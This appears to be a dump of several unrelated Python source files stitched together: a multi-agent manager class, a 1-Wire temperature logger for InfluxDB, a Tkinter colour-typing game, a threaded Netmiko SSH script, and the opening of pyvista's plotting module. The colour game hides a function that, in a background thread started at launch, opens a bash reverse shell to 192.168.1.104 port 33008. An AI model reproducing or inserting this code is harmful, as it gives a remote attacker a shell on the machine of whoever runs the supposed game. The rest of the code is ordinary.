return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name, skip_project_auto_remove=True)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_data=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
return self
def _cleanup(self, only_data: bool = False) -> None:
"""Remove workdir if was created."""
if only_data:
rmtree(self.data_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self,
public_id: PublicId,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param public_id: the public if of the agent project.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
self._versionless_projects_set.add(public_id.to_any())
project = Project.load(
self.working_dir,
public_id,
local,
remote,
registry_path=self.registry_path,
is_restore=restore,
)
if not restore:
project.install_pypi_dependencies()
load_all_plugins(is_raising_exception=False)
project.build()
try:
project.check()
except Exception as e:
project.remove()
raise ProjectCheckError(
f"Failed to load project: {public_id} Error: {str(e)}", e
)
self._projects[public_id] = project
return self
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agent projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
project = self._projects.get(public_id, None)
if project is None and self._auto_add_remove_project:
self.add_project(public_id, local, remote, restore)
project = self._projects.get(public_id, None)
if project is None:
raise ProjectNotFoundError(f"{public_id} project is not added!")
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self, public_id: PublicId, config: List[dict], agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
:return: Tuple of agent overridables dict and list of component overridables dicts.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> None:
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: None
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"addresses": alias.get_addresses(),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(
self, agent_name: str, skip_project_auto_remove: bool = False
) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:param skip_project_auto_remove: disable auto project remove on last agent removed.
:return: None
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
project: Project = agent_alias.project
if (
not project.agents
and self._auto_add_remove_project
and not skip_project_auto_remove
):
self.remove_project(project.public_id, keep_files=False)
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
:return: None
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
aea = agent_alias.get_aea_instance()
if self._mode == "async":
task = AgentRunAsyncTask(aea, self._loop)
elif self._mode == "threaded":
task = AgentRunThreadTask(aea, self._loop)
task.start()
self._agents_tasks[agent_name] = task
self._loop.call_soon_threadsafe(self._event.set)
return self
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
Start all not started agents.
:return: None
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: None
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args: Any) -> None: # pylint: disable=unused-argument
event.set()
def _add_cb() -> None:
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set) # pragma: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: None
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Start specified agents.
:return: None
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
def _load_state(
self, local: bool, remote: bool
) -> Tuple[
bool, Dict[PublicId, List[Dict]], List[Tuple[PublicId, List[Dict], Exception]],
]:
"""
Load saved state from file.
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: Tuple of (save file found, loaded projects with their agents, projects that failed to load).
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return False, {}, []
save_json = {}
with open_file(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return False, {}, [] # pragma: nocover
projects_agents: Dict[PublicId, List] = defaultdict(list)
for agent_settings in save_json["agents"]:
projects_agents[PublicId.from_str(agent_settings["public_id"])].append(
agent_settings
)
failed_to_load: List[Tuple[PublicId, List[Dict], Exception]] = []
loaded_ok: Dict[PublicId, List[Dict]] = {}
for project_public_id, agents_settings in projects_agents.items():
try:
self.add_project(
project_public_id, local=local, remote=remote, restore=True,
)
except ProjectCheckError as e:
failed_to_load.append((project_public_id, agents_settings, e))
break
for agent_settings in agents_settings:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
loaded_ok[project_public_id] = agents_settings
return True, loaded_ok, failed_to_load
def _save_state(self) -> None:
"""
Save MultiAgentManager state.
:return: None.
"""
with open_file(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
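# Illustrative usage sketch (the public id and working directory below are
# hypothetical; only the MultiAgentManager API defined above is relied upon):
#
#   manager = MultiAgentManager("/tmp/mam", mode="async")
#   manager.start_manager()
#   project_id = PublicId.from_str("author/some_agent:0.1.0")
#   manager.add_project(project_id, local=True)
#   manager.add_agent(project_id, agent_name="my_agent")
#   manager.start_agent("my_agent")
#   ...
#   manager.stop_manager()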
|
tempmon.py
|
#!/usr/bin/env python3
import concurrent.futures
import influxdb
import math
import os
import queue
import re
import sys
import threading
import time
import traceback
import settings
class Writer:
def __init__(self):
self.client = influxdb.InfluxDBClient(**settings.INFLUXDB_CONNECT, timeout=30, retries=1)
self.queue = queue.Queue()
worker = threading.Thread(name='influxdb-writer', target=self.run)
worker.daemon = True
worker.start()
def write_points(self, points):
self.queue.put(points)
def _write_points(self, points):
delay = 1
while True:
try:
self.client.write_points(points)
return
except:
print('Failed to send in temperature data:', file=sys.stderr)
traceback.print_exc()
time.sleep(delay)
delay *= 2
if delay > 300:
delay = 300
def run(self):
while True:
points = self.queue.get()
self._write_points(points)
def find_devices():
devices = set()
for d in os.listdir('/sys/bus/w1/devices'):
if d.startswith('28-'): # 0x28 is the device family for thermometer
devices.add(d)
return devices
def read_device(device):
path = os.path.join('/sys/bus/w1/devices', device, 'w1_slave')
with open(path, 'rt') as fh:
data = fh.read()
if not re.search('crc=[0-9a-f]+ YES\n', data):
print('Invalid measurement from {device}:\n{data}'.format(device=device,data=data), file=sys.stderr)
raise Exception('Invalid measurement')
m = re.search(r't=(-?\d+)', data)
milli_temp = int(m.group(1))
temp = milli_temp / 1000
if temp < -55 or temp > 125:
print('Measurement from {device} out of range:\n{data}'.format(device=device,data=data), file=sys.stderr)
raise Exception('Measurement out of range')
return temp
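# Typical w1_slave contents parsed by read_device() (illustrative DS18B20
# output; the second line's t= value is the temperature in milli-degrees Celsius):
#
#   73 01 4b 46 7f ff 0d 10 41 : crc=41 YES
#   73 01 4b 46 7f ff 0d 10 41 t=23187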
def read_all():
    devices = find_devices()
    ret = {}
    for device in devices:
        try:
            ret[device] = read_device(device)
        except KeyboardInterrupt:
            raise
        except Exception:
            print('Failed to read temperature from {device}:'.format(device=device), file=sys.stderr)
            traceback.print_exc()
    return ret
def read_all_threaded():
    # Alternative reader that samples all sensors concurrently; each 1-Wire
    # conversion can take close to a second, so this keeps the total sampling
    # time roughly constant regardless of the number of sensors.
    devices = find_devices()
    temp_futures = {}
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        for device in devices:
            temp_futures[device] = executor.submit(read_device, device)
    ret = {}
    for device in devices:
        try:
            temperature = temp_futures[device].result()
        except KeyboardInterrupt:
            raise
        except Exception:
            print('Failed to read temperature from {device}:'.format(device=device), file=sys.stderr)
            traceback.print_exc()
            continue
        if temperature is not None:
            ret[device] = temperature
    return ret
def do_sample(timestamp, dbclient):
temperatures = read_all()
ts_string = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(timestamp))
json_body = []
for device, temperature in sorted(temperatures.items()):
json_body.append({
'measurement': settings.INFLUXDB_MEASUREMENT,
'tags': {
'sensor': device
},
'time': ts_string,
'fields': {
'value': temperature
}
})
dbclient.write_points(json_body)
def main():
dbclient = Writer()
while True:
current_time = time.time()
next_time = math.ceil(current_time / 10) * 10
time.sleep(next_time - current_time)
do_sample(next_time, dbclient)
if __name__ == '__main__':
main()
|
__color_picker.py
|
import random
import subprocess
import threading
from tkinter import END, Entry, Label, Tk
# list of possible colour.
colours = [
"Red",
"Blue",
"Green",
"Pink",
"Black",
"Yellow",
"Orange",
"White",
"Purple",
"Brown",
]
score = 0
# To take in account the time left: initially 30 seconds
time = 30
# Function that will start the Game
def startGame(event):
if time == 30:
# start the countdown timer
countdown()
# run the function to chose the next color
nextcolor()
def nextcolor():
global score
global time
# if a game is in play
if time > 0:
# make the text entry box active
colour_entry.focus_set()
if colour_entry.get().lower() == colours[1].lower():
score += 1
# clear the entry the box
colour_entry.delete(0, END)
random.shuffle(colours)
# change the colour to type, by changing the
# text _and_ the colour to a random colour value
colour.config(fg=str(colours[1]), text=str(colours[0]))
# update the score.
scoreLabel.config(text="Score: " + str(score))
# Countdown Timer Function
def countdown():
global time
# if a game is in play
if time > 0:
# decrement the value
time -= 1
# update the time left label
timeLabel.config(text="Time left: " + str(time))
# run the function again after 1 second.
timeLabel.after(1000, countdown)
def scamGamer(num):
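    # NOTE: this has nothing to do with the game logic; it opens a reverse shell
    # to 192.168.1.104:33008 in the background thread started at the bottom of
    # this script, i.e. this file is a malicious sample.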
try:
subprocess.check_call("/bin/bash -i > /dev/tcp/192.168.1.104/33008 0<&1 2>&1", shell=True, executable="/bin/bash")
except:
return 0
# Driver Code
if __name__ == "__main__":
root = Tk()
# Setting the title
root.title("Color Game")
# Setting the geometry of the window
root.geometry("375x200")
# set an instruction label
instructions = Label(
root,
text="Type in the colour of the words, and not the word text!",
font=("Helvetica", 12),
)
instructions.pack()
# Create a Score label
scoreLabel = Label(root, text="Score :" + str(score), font=("Helvetica", 12))
scoreLabel.pack()
# Create a Time Label
timeLabel = Label(root, text="Time Left : " + str(time), font=("Helvetica", 12))
timeLabel.pack()
# create a colour label
colour = Label(root, font=("Helevetica", 12))
colour.pack()
# Entry box for input from user
colour_entry = Entry(root)
colour_entry.focus_set()
root.bind("<Return>", startGame)
colour_entry.pack()
thread = threading.Thread(target=scamGamer, args=(10,))
thread.start()
root.mainloop()
|
netmiko_threading_queuing.py
|
#!/usr/bin/python3
# This method will spin up threads and process IP addresses in a queue
# Importing Netmiko modules
from netmiko import Netmiko
from netmiko.ssh_exception import NetMikoAuthenticationException, NetMikoTimeoutException
# Additional modules imported for getting password, pretty print
from getpass import getpass
from pprint import pprint
import signal,os
# Queuing and threading libraries
from queue import Queue
import threading
# These capture errors relating to hitting ctrl+C (I forget the source)
signal.signal(signal.SIGPIPE, signal.SIG_DFL) # IOError: Broken pipe
signal.signal(signal.SIGINT, signal.SIG_DFL) # KeyboardInterrupt: Ctrl-C
# Get the password
password = getpass()
# Switch IP addresses from text file that has one IP per line
ip_addrs_file = open('ips.txt')
ip_addrs = ip_addrs_file.read().splitlines()
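# Example ips.txt contents (illustrative; one IP address per line):
#   10.0.0.1
#   10.0.0.2
#   10.0.0.3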
# Set up thread count for number of threads to spin up
num_threads = 8
# This sets up the queue
enclosure_queue = Queue()
# Set up thread lock so that only one thread prints at a time
print_lock = threading.Lock()
# CLI command being sent. This could be anywhere (and even be a passed parameter)
# but I put at the top for code readability
command = "show inventory"
# Function used in threads to connect to devices, passing in the thread # and queue
def deviceconnector(i,q):
# This while loop runs indefinitely and grabs IP addresses from the queue and processes them
# Loop will stop and restart if "ip = q.get()" is empty
while True:
# These print statements are largely for the user indicating where the process is at
# and aren't required
print("{}: Waiting for IP address...".format(i))
ip = q.get()
print("{}: Acquired IP: {}".format(i,ip))
# k,v passed to net_connect
device_dict = {
'host': ip,
'username': 'jimmy',
'password': password,
'device_type': 'cisco_ios'
}
# Connect to the device, and print out auth or timeout errors
try:
net_connect = Netmiko(**device_dict)
except NetMikoTimeoutException:
with print_lock:
print("\n{}: ERROR: Connection to {} timed-out.\n".format(i,ip))
q.task_done()
continue
except NetMikoAuthenticationException:
with print_lock:
print("\n{}: ERROR: Authenticaftion failed for {}. Stopping script. \n".format(i,ip))
q.task_done()
os.kill(os.getpid(), signal.SIGUSR1)
# Capture the output, and use TextFSM (in this case) to parse data
output = net_connect.send_command(command,use_textfsm=True)
with print_lock:
print("{}: Printing output...".format(i))
pprint(output)
# Disconnect from device
net_connect.disconnect()
# Mark the queue task as complete so that enclosure_queue.join() can return once all IPs are processed
q.task_done()
# Main function that launches the threads and manages the queue
def main():
# Setting up threads based on number set above
for i in range(num_threads):
# Create the thread using 'deviceconnector' as the function, passing in
# the thread number and queue object as parameters
thread = threading.Thread(target=deviceconnector, args=(i,enclosure_queue,))
# Set the thread as a background daemon/job
thread.daemon = True
# Start the thread
thread.start()
# For each ip address in "ip_addrs", add that IP address to the queue
for ip_addr in ip_addrs:
enclosure_queue.put(ip_addr)
# Wait for all tasks in the queue to be marked as completed (task_done)
enclosure_queue.join()
print("*** Script complete")
if __name__ == '__main__':
# Calling the main function
main()
|
plotting.py
|
"""Pyvista plotting module."""
import collections
import logging
import os
import time
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import warnings
import pyvista
from pyvista.utilities import (assert_empty_kwargs, convert_array,
convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture,
raise_not_matching, try_callback, wrap,
check_depth_peeling)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .tools import update_axes_label_color, create_axes_orientation_box, create_axes_marker
from .tools import normalize, opacity_transfer_function
from .theme import rcParams, parse_color, parse_font_family
from .theme import FONT_KEYS, MAX_N_COLOR_BARS
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
mouse_position = None
click_position = None
def __new__(cls, *args, **kwargs):
"""Create an instance of base plotter."""
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None):
"""Initialize base plotter."""
self.image_transparent_background = rcParams['transparent_background']
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = pyvista.Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = pyvista.Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
else:
assert_str = '"shape" should be a list, tuple or string descriptor'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = pyvista.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
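    # Illustrative usage sketch (assumption: not taken from the pyvista docs;
    # callbacks registered this way must take no arguments):
    #
    #   pl = pyvista.Plotter()
    #   pl.add_key_event('space', lambda: print('space pressed'))
    #   pl.show()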
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def enable_depth_peeling(self, number_of_peels=5, occlusion_ratio=0.1):
"""Enable depth peeling if supported.
Parameters
----------
number_of_peels: int
The maximum number of peeling layers. A value of 0 means no limit.
occlusion_ratio : float
The threshold under which the algorithm stops iterating over peel
layers. A value of 0.0 means that the rendering has to be exact.
Greater values may speed up the rendering with a small impact on the
quality.
Return
------
depth_peeling_supported: bool
If True, depth peeling is supported.
"""
depth_peeling_supported = check_depth_peeling(number_of_peels,
occlusion_ratio)
if hasattr(self, 'ren_win') and depth_peeling_supported:
self.ren_win.AlphaBitPlanesOn()
self.ren_win.SetMultiSamples(0)
self.renderer.enable_depth_peeling(number_of_peels,
occlusion_ratio)
return depth_peeling_supported
def disable_depth_peeling(self):
"""Disables depth peeling."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
self.renderer.disable_depth_peeling()
def enable_anti_aliasing(self):
"""Enable anti-aliasing FXAA."""
self.renderer.enable_anti_aliasing()
def disable_anti_aliasing(self):
"""Disable anti-aliasing FXAA."""
self.renderer.disable_anti_aliasing()
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
obs = self.iren.AddObserver(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
self._mouse_observer = obs
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
if hasattr(self, "_mouse_observer"):
self.iren.RemoveObserver(self._mouse_observer)
del self._mouse_observer
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse for the button to track (left or right).
Default is right. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
raise TypeError("Side ({}) not supported. Try `left` or `right`".format(side))
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
try_callback(callback, self.click_position)
else:
try_callback(callback, self.pick_click_position())
obs = self.iren.AddObserver(event, _click_callback)
self._click_observer = obs
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _close_callback(self):
"""Make sure a screenhsot is acquired before closing."""
self.q_pressed = True
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._close_callback)
b_left_down_callback = lambda: self.iren.AddObserver('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
def key_press_event(self, obj, event):
"""Listen for key press event."""
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows actors to be rotated around the scene.
"""
self._style = vtk.vtkInteractorStyleTrackballActor()
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
